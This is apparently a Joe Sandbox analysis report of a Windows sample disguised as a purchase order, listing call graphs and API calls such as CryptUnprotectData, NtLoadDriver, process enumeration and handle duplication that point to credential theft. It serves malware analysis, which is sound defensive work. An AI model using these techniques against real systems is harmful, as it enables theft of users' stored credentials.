39332->39335 39333->39332 39334 414463 _snwprintf 39333->39334 39334->39335 39335->39327 39336->38584 39338 40b2cc 27 API calls 39337->39338 39339 409615 39338->39339 39340 409d1f 6 API calls 39339->39340 39341 409625 39340->39341 39366 409b98 GetFileAttributesW 39341->39366 39343 409634 39344 409648 39343->39344 39367 4091b8 memset 39343->39367 39346 40b2cc 27 API calls 39344->39346 39349 408801 39344->39349 39347 40965d 39346->39347 39348 409d1f 6 API calls 39347->39348 39350 40966d 39348->39350 39349->38587 39349->38614 39419 409b98 GetFileAttributesW 39350->39419 39352 40967c 39352->39349 39353 409681 39352->39353 39420 409529 72 API calls 39353->39420 39355 409690 39355->39349 39356->38609 39366->39343 39421 40a6e6 WideCharToMultiByte 39367->39421 39369 409202 39422 444432 39369->39422 39372 40b273 27 API calls 39373 409236 39372->39373 39468 438552 39373->39468 39376 409383 39378 40b273 27 API calls 39376->39378 39379 409399 39378->39379 39382 438552 134 API calls 39379->39382 39400 4093a3 39382->39400 39386 4094ff 39389 4251c4 137 API calls 39389->39400 39393 4093df 39496 424f26 123 API calls 39393->39496 39395 4253cf 17 API calls 39395->39400 39399 40951d 39399->39344 39400->39386 39400->39389 39400->39393 39400->39395 39403 4093e4 39400->39403 39494 4253af 17 API calls 39403->39494 39419->39352 39420->39355 39421->39369 39518 4438b5 39422->39518 39424 44444c 39425 409215 39424->39425 39532 415a6d 39424->39532 39425->39372 39425->39399 39427 4442e6 11 API calls 39429 44469e 39427->39429 39428 444486 39430 4444b9 memcpy 39428->39430 39467 4444a4 39428->39467 39429->39425 39432 443d90 111 API calls 39429->39432 39536 415258 39430->39536 39432->39425 39433 444524 39434 444541 39433->39434 39435 44452a 39433->39435 39539 444316 39434->39539 39436 416935 16 API calls 39435->39436 39436->39467 39439 444316 18 API calls 39440 444563 39439->39440 39441 444316 18 API calls 39440->39441 39442 44456f 39441->39442 39467->39427 39657 438460 39468->39657 39470 409240 39470->39376 39471 4251c4 39470->39471 39708 424f07 39471->39708 39473 4251e4 39474 4251f7 39473->39474 39475 4251e8 39473->39475 39496->39386 39519 4438d0 39518->39519 39529 4438c9 39518->39529 39606 415378 memcpy memcpy 39519->39606 39529->39424 39533 415a77 39532->39533 39534 415a8d 39533->39534 39535 415a7e memset 39533->39535 39534->39428 39535->39534 39537 4438b5 11 API calls 39536->39537 39538 41525d 39537->39538 39538->39433 39540 444328 39539->39540 39541 444423 39540->39541 39542 44434e 39540->39542 39607 4446ea 11 API calls 39541->39607 39543 432d4e 3 API calls 39542->39543 39545 44435a 39543->39545 39547 444375 39545->39547 39552 44438b 39545->39552 39546 432d4e 3 API calls 39548 4443ec 39546->39548 39549 416935 16 API calls 39547->39549 39550 444381 39548->39550 39551 416935 16 API calls 39548->39551 39549->39550 39550->39439 39551->39550 39552->39546 39607->39550 39669 41703f 39657->39669 39659 43847a 39660 43848a 39659->39660 39661 43847e 39659->39661 39676 438270 39660->39676 39706 4446ea 11 API calls 39661->39706 39666 4384bb 39667 438270 134 API calls 39666->39667 39668 438488 39667->39668 39668->39470 39670 417044 39669->39670 39671 41705c 39669->39671 39673 416760 11 API calls 39670->39673 39675 417055 39670->39675 39672 417075 39671->39672 39674 41707a 11 API calls 39671->39674 39672->39659 39673->39675 39674->39670 39675->39659 39677 415a91 memset 39676->39677 39678 43828d 39677->39678 39679 438297 39678->39679 39680 438341 39678->39680 39682 4382d6 39678->39682 39681 415c7d 16 API calls 39679->39681 39683 44358f 19 API calls 39680->39683 39684 438458 39681->39684 39685 4382fb 39682->39685 39686 4382db 39682->39686 39696 438318 39683->39696 39684->39668 39707 424f26 123 API calls 39684->39707 39688 415c23 memcpy 39685->39688 39687 416935 16 API calls 39686->39687 39689 4382e9 39687->39689 39690 438305 39688->39690 39691 415c7d 16 API calls 39689->39691 39693 44358f 19 API calls 39690->39693 39690->39696 39691->39679 39692 438373 39695 438383 39692->39695 39697 4300e8 memset memset memcpy 39692->39697 39693->39696 39694 43819e 115 API calls 39694->39692 39698 4383cd 39695->39698 39700 415c23 memcpy 39695->39700 39696->39692 39696->39694 39697->39695 39700->39698 39706->39668 39707->39666 39709 424f1f 39708->39709 39710 424f0c 39708->39710 39729 424eea 11 API calls 39709->39729 39728 416760 11 API calls 39710->39728 39713 424f18 39713->39473 39714 424f24 39714->39473 39728->39713 39729->39714 39807 413f4f 39780->39807 39783 413f37 K32GetModuleFileNameExW 39784 413f4a 39783->39784 39784->38644 39786 413969 wcscpy 39785->39786 39787 41396c wcschr 39785->39787 39790 413a3a 39786->39790 39787->39786 39789 41398e 39787->39789 39812 4097f7 wcslen wcslen _memicmp 39789->39812 39790->38644 39792 41399a 39793 4139a4 memset 39792->39793 39794 4139e6 39792->39794 39813 409dd5 GetWindowsDirectoryW wcscpy 39793->39813 39796 413a31 wcscpy 39794->39796 39797 4139ec memset 39794->39797 39796->39790 39814 409dd5 GetWindowsDirectoryW wcscpy 39797->39814 39798 4139c9 wcscpy wcscat 39798->39790 39800 413a11 memcpy wcscat 39800->39790 39802 413cb0 GetModuleHandleW 39801->39802 39803 413cda 39801->39803 39802->39803 39806 413cbf GetProcAddress 39802->39806 39804 413ce3 GetProcessTimes 39803->39804 39805 413cf6 39803->39805 39804->38649 39805->38649 39806->39803 39808 413f2f 39807->39808 39809 413f54 39807->39809 39808->39783 39808->39784 39810 40a804 8 API calls 39809->39810 39811 413f5f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 39810->39811 39811->39808 39812->39792 39813->39798 39814->39800 39815->38669 39816->38693 39818 409cf9 GetVersionExW 39817->39818 39819 409d0a 39817->39819 39818->39819 39819->38698 39819->38704 39820->38705 39821->38709 39822->38711 39823->38777 39825 40bba5 39824->39825 39869 40cc26 39825->39869 39828 40bd4b 39890 40cc0c 39828->39890 39833 40b2cc 27 API calls 39834 40bbef 39833->39834 39897 40ccf0 _wcsicmp 39834->39897 39836 40bbf5 39836->39828 39898 40ccb4 6 API calls 39836->39898 39838 40bc26 39839 40cf04 17 API calls 39838->39839 39840 40bc2e 39839->39840 39841 40bd43 39840->39841 39842 40b2cc 27 API calls 39840->39842 39843 40cc0c 4 API calls 39841->39843 39844 40bc40 39842->39844 39843->39828 39899 40ccf0 _wcsicmp 39844->39899 39846 40bc46 39846->39841 39847 40bc61 memset memset WideCharToMultiByte 39846->39847 39900 40103c strlen 39847->39900 39849 40bcc0 39850 40b273 27 API calls 39849->39850 39851 40bcd0 memcmp 39850->39851 39851->39841 39852 40bce2 39851->39852 39853 404423 38 API calls 39852->39853 39854 40bd10 39853->39854 39854->39841 39855 40bd3a LocalFree 39854->39855 39856 40bd1f memcpy 39854->39856 39855->39841 39856->39855 39857->38792 39858->38829 39859->38829 39860->38829 39861->38829 39862->38829 39863->38829 39864->38829 39865->38829 39866->38829 39867->38804 39868->38826 39901 4096c3 CreateFileW 39869->39901 39871 40cc34 39872 40cc3d GetFileSize 39871->39872 39880 40bbca 39871->39880 39873 40afcf 2 API calls 39872->39873 39874 40cc64 39873->39874 39902 40a2ef ReadFile 39874->39902 39876 40cc71 39903 40ab4a MultiByteToWideChar 39876->39903 39878 40cc95 CloseHandle 39879 40b04b ??3@YAXPAX 39878->39879 39879->39880 39880->39828 39881 40cf04 39880->39881 39882 40b633 free 39881->39882 39883 40cf14 39882->39883 39909 40b1ab free free 39883->39909 39885 40cf1b 39886 40cfef 39885->39886 39889 40bbdd 39885->39889 39910 40cd4b 39885->39910 39888 40cd4b 14 API calls 39886->39888 39888->39889 39889->39828 39889->39833 39891 40b633 free 39890->39891 39892 40cc15 39891->39892 39893 40aa04 free 39892->39893 39894 40cc1d 39893->39894 39951 40b1ab free free 39894->39951 39896 40b7d4 memset CreateFileW 39896->38784 39896->38785 39897->39836 39898->39838 39899->39846 39900->39849 39901->39871 39902->39876 39904 40ab93 39903->39904 39905 40ab6b 39903->39905 39904->39878 39906 40a9ce 4 API calls 39905->39906 39907 40ab74 39906->39907 39908 40ab7c MultiByteToWideChar 39907->39908 39908->39904 39909->39885 39911 40cd7b 39910->39911 39912 40aa29 6 API calls 39911->39912 39916 40cd89 39912->39916 39913 40cef5 39914 40aa04 free 39913->39914 39915 40cefd 39914->39915 39915->39885 39916->39913 39917 40aa29 6 API calls 39916->39917 39918 40ce1d 39917->39918 39919 40aa29 6 API calls 39918->39919 39920 40ce3e 39919->39920 39921 40ce6a 39920->39921 39944 40abb7 wcslen memmove 39920->39944 39922 40ce9f 39921->39922 39947 40abb7 wcslen memmove 39921->39947 39925 40a8d0 7 API calls 39922->39925 39928 40ceb5 39925->39928 39926 40ce56 39945 40aa71 wcslen 39926->39945 39927 40ce8b 39948 40aa71 wcslen 39927->39948 39932 40a8d0 7 API calls 39928->39932 39931 40ce5e 39946 40abb7 wcslen memmove 39931->39946 39935 40cecb 39932->39935 39933 40ce93 39949 40abb7 wcslen memmove 39933->39949 39950 40d00b malloc memcpy free free 39935->39950 39938 40cedd 39939 40aa04 free 39938->39939 39940 40cee5 39939->39940 39941 40aa04 free 39940->39941 39942 40ceed 39941->39942 39943 40aa04 free 39942->39943 39943->39913 39944->39926 39945->39931 39946->39921 39947->39927 39948->39933 39949->39922 39950->39938 39951->39896 39952->38844 39953->38852 40449 441819 40452 430737 40449->40452 40451 441825 40453 430756 40452->40453 40465 43076d 40452->40465 40454 430774 40453->40454 40455 43075f 40453->40455 40467 43034a memcpy 40454->40467 40466 4169a7 11 API calls 40455->40466 40458 4307ce 40460 430819 memset 40458->40460 40468 415b2c 11 API calls 40458->40468 40459 43077e 40459->40458 40463 4307fa 40459->40463 40459->40465 40460->40465 40462 4307e9 40462->40460 40462->40465 40469 4169a7 11 API calls 40463->40469 40465->40451 40466->40465 40467->40459 40468->40462 40469->40465 40470 41493c EnumResourceNamesW

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 338 40dd85-40ddeb memset call 409bca CreateFileW 341 40ddf1-40de09 call 40afcf call 41352f 338->341 346 40de0b-40de1a NtQuerySystemInformation 341->346 347 40de1c 341->347 348 40de20-40de27 346->348 347->348 349 40de29-40de39 348->349 350 40de3b-40de52 CloseHandle GetCurrentProcessId 348->350 349->341 349->350 351 40de54-40de58 350->351 352 40de7a-40de8e call 413cfa call 413d4c 350->352 351->352 353 40de5a 351->353 362 40de94-40debb call 40e6ad call 409c52 _wcsicmp 352->362 363 40e00c-40e01b call 413d29 352->363 355 40de5d-40de63 353->355 357 40de74-40de78 355->357 358 40de65-40de6c 355->358 357->352 357->355 358->357 360 40de6e-40de71 358->360 360->357 370 40dee7-40def7 OpenProcess 362->370 371 40debd-40dece _wcsicmp 362->371 373 40dff8-40dffb 370->373 374 40defd-40df02 370->374 371->370 372 40ded0-40dee1 _wcsicmp 371->372 372->370 375 40dffd-40e006 372->375 373->363 373->375 376 40df08 374->376 377 40dfef-40dff2 CloseHandle 374->377 375->362 375->363 378 40df0b-40df10 376->378 377->373 379 40df16-40df1d 378->379 380 40dfbd-40dfcb 378->380 379->380 382 40df23-40df4a GetCurrentProcess DuplicateHandle 379->382 380->378 381 40dfd1-40dfd3 380->381 381->377 382->380 383 40df4c-40df76 memset call 41352f 382->383 386 40df78-40df8a 383->386 387 40df8f-40dfbb CloseHandle call 409c52 * 2 _wcsicmp 383->387 386->387 387->380 392 40dfd5-40dfed 387->392 392->377
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 0040DDAD
                                                                                                        • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                                                                                                      • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                                        • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                                                                        • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                                                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                                                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                                                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                                                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                                                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                                                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                                                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                                                                      • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                                      • CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                                                      • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                                      • _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                                      • _wcsicmp.MSVCRT ref: 0040DEC5
                                                                                                      • _wcsicmp.MSVCRT ref: 0040DED8
                                                                                                      • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                                                                                                      • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                                                                                                      • DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                                                                                                      • memset.MSVCRT ref: 0040DF5F
                                                                                                      • CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 0040DF92
                                                                                                      • _wcsicmp.MSVCRT ref: 0040DFB2
                                                                                                      • CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 0040DFF2
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc$Handle$_wcsicmp$CloseProcess$CurrentFileModulememset$??2@CreateDuplicateInformationNameOpenQuerySystem
                                                                                                      • String ID: dllhost.exe$p+8w@F8w@B8w$taskhost.exe$taskhostex.exe
                                                                                                      • API String ID: 708747863-2348828428
                                                                                                      • Opcode ID: 5cab624b8928eaf00a06d38b2ee3d6eb31f92f98f3d88623932f7a2009947366
                                                                                                      • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                                                                                                      • Opcode Fuzzy Hash: 5cab624b8928eaf00a06d38b2ee3d6eb31f92f98f3d88623932f7a2009947366
                                                                                                      • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 635 413d4c-413da0 call 40b633 CreateToolhelp32Snapshot memset Process32FirstW 638 413f00-413f11 Process32NextW 635->638 639 413da5-413ded OpenProcess 638->639 640 413f17-413f24 CloseHandle 638->640 641 413eb0-413eb5 639->641 642 413df3-413e26 memset call 413f27 639->642 641->638 644 413eb7-413ebd 641->644 650 413e79-413e9d call 413959 call 413ca4 642->650 651 413e28-413e35 642->651 645 413ec8-413eda call 4099f4 644->645 646 413ebf-413ec6 free 644->646 648 413edb-413ee2 645->648 646->648 655 413ee4 648->655 656 413ee7-413efe 648->656 662 413ea2-413eae CloseHandle 650->662 653 413e61-413e68 651->653 654 413e37-413e44 GetModuleHandleW 651->654 653->650 659 413e6a-413e76 653->659 654->653 658 413e46-413e5c GetProcAddress 654->658 655->656 656->638 658->653 659->650 662->641
                                                                                                      APIs
                                                                                                        • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,?), ref: 00413D6A
                                                                                                      • memset.MSVCRT ref: 00413D7F
                                                                                                      • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                                                                                                      • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                                                                                                      • memset.MSVCRT ref: 00413E07
                                                                                                      • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                                                                                                      • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 00413EA8
                                                                                                      • free.MSVCRT ref: 00413EC1
                                                                                                      • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                                                                                                      • CloseHandle.KERNEL32(00000000,00000000,0000022C), ref: 00413F1A
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Handle$CloseProcess32freememset$AddressCreateFirstModuleNextOpenProcProcessSnapshotToolhelp32
                                                                                                      • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                                                                      • API String ID: 1344430650-1740548384
                                                                                                      • Opcode ID: 7edb3ed668d67efb41ddc3a99b3dcc2d3fa5e99a9f713289acc2c2ca3bb66fb8
                                                                                                      • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                                                                                                      • Opcode Fuzzy Hash: 7edb3ed668d67efb41ddc3a99b3dcc2d3fa5e99a9f713289acc2c2ca3bb66fb8
                                                                                                      • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 773 40b58d-40b59e 774 40b5a4-40b5c0 GetModuleHandleW FindResourceW 773->774 775 40b62e-40b632 773->775 776 40b5c2-40b5ce LoadResource 774->776 777 40b5e7 774->777 776->777 778 40b5d0-40b5e5 SizeofResource LockResource 776->778 779 40b5e9-40b5eb 777->779 778->779 779->775 780 40b5ed-40b5ef 779->780 780->775 781 40b5f1-40b629 call 40afcf memcpy call 40b4d3 call 40b3c1 call 40b04b 780->781 781->775
                                                                                                      APIs
                                                                                                      • GetModuleHandleW.KERNEL32(00000000,?, AE,?,?,00411B78,?,General,?,00000000,00000001), ref: 0040B5A5
                                                                                                      • FindResourceW.KERNELBASE(00000000,00000032,BIN), ref: 0040B5B6
                                                                                                      • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                                                                                                      • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                                                                                                      • LockResource.KERNEL32(00000000), ref: 0040B5DD
                                                                                                      • memcpy.MSVCRT(00000000,00000000,00000000), ref: 0040B60D
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                                                                                                      • String ID: AE$BIN
                                                                                                      • API String ID: 1668488027-3931574542
                                                                                                      • Opcode ID: 34e809506899ed03cb1dc36614dfe32cef5e62f1a3b34244b0efced66f6d4593
                                                                                                      • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                                                                                                      • Opcode Fuzzy Hash: 34e809506899ed03cb1dc36614dfe32cef5e62f1a3b34244b0efced66f6d4593
                                                                                                      • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
                                                                                                      APIs
                                                                                                      • CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                                                                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                      • GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                      • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Library$Load$AddressCryptDataDirectoryFreeProcSystemUnprotectmemsetwcscatwcscpy
                                                                                                      • String ID:
                                                                                                      • API String ID: 767404330-0
                                                                                                      • Opcode ID: 91f5c8417cc05eb5371089ee99512099cd95d68580e827c1857cd6a30ed1daf0
                                                                                                      • Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
                                                                                                      • Opcode Fuzzy Hash: 91f5c8417cc05eb5371089ee99512099cd95d68580e827c1857cd6a30ed1daf0
                                                                                                      • Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
                                                                                                      APIs
                                                                                                      • FindFirstFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                                                                                                      • FindNextFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileFind$FirstNext
                                                                                                      • String ID:
                                                                                                      • API String ID: 1690352074-0
                                                                                                      • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                                      • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                                                                                                      • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                                      • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 0041898C
                                                                                                      • GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InfoSystemmemset
                                                                                                      • String ID:
                                                                                                      • API String ID: 3558857096-0
                                                                                                      • Opcode ID: 1cb27ac447f4cf033b6cba199a5ddcb1fdd974c12d9e405e28a5f35c0eb83b67
                                                                                                      • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                                                                                                      • Opcode Fuzzy Hash: 1cb27ac447f4cf033b6cba199a5ddcb1fdd974c12d9e405e28a5f35c0eb83b67
                                                                                                      • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 0 44553b-445558 call 44db70 3 445599-4455a2 0->3 4 44555a-44557c call 40c768 call 40bdb0 call 4135f7 0->4 5 4455a8-4455e3 memset call 403988 wcsrchr 3->5 6 4457fb 3->6 40 44558e-445594 call 444b06 4->40 41 44557e-44558c call 4136c0 call 41366b 4->41 19 4455e5 5->19 20 4455e8-4455f9 5->20 10 445800-445809 6->10 11 445856-44585f 10->11 12 44580b-44581e call 40a889 call 403e2d 10->12 15 445861-445874 call 40a889 call 403c9c 11->15 16 4458ac-4458b5 11->16 42 445823-445826 12->42 49 445879-44587c 15->49 21 44594f-445958 16->21 22 4458bb-44592b memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 16->22 19->20 23 445672-445683 call 40a889 call 403fbe 20->23 24 4455fb-445601 20->24 35 4459f2-4459fa 21->35 36 44595e-4459ce memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 21->36 135 44592d-445945 call 40b6ef 22->135 136 44594a 22->136 84 445685 23->84 85 4456b2-4456b5 call 40b1ab 23->85 29 445605-445607 24->29 30 445603 24->30 29->23 38 445609-44560d 29->38 30->29 44 445a00-445aa1 memset * 2 call 414c2e call 40b2cc call 409d1f call 40b2cc call 40ae18 35->44 45 445b29-445b32 35->45 153 4459d0-4459e8 call 40b6ef 36->153 154 4459ed 36->154 38->23 48 44560f-445641 call 4087b3 call 40a889 call 4454bf 38->48 40->3 41->40 51 44584c-445854 call 40b1ab 42->51 52 445828 42->52 182 445b08-445b15 call 40ae51 44->182 53 445c7c-445c85 45->53 54 445b38-445b96 memset * 3 45->54 150 445665-445670 call 40b1ab 48->150 151 445643-445663 call 40a9b5 call 4087b3 48->151 64 4458a2-4458aa call 40b1ab 49->64 65 44587e 49->65 51->11 67 44582e-445847 call 40a9b5 call 4087b3 52->67 61 445d1c-445d25 53->61 62 445c8b-445cf3 memset * 2 call 414c2e call 409d1f call 409b98 53->62 68 445bd4-445c72 call 414c2e call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 54->68 69 445b98-445ba0 54->69 73 445fae-445fb2 61->73 74 445d2b-445d3b 61->74 168 445cf5 62->168 169 445cfc-445d03 62->169 64->16 81 445884-44589d call 40a9b5 call 4087b3 65->81 138 445849 67->138 247 445c77 68->247 69->68 83 445ba2-445bcf call 4099c6 call 445403 call 445389 69->83 90 445d3d-445d65 call 409c52 call 40b2cc _wcsicmp 74->90 91 445d88-445e15 memset * 3 call 414c2e call 40b2cc call 409d1f call 409b98 74->91 156 44589f 81->156 83->53 100 44568b-4456a4 call 40a9b5 call 4087b3 84->100 104 4456ba-4456c4 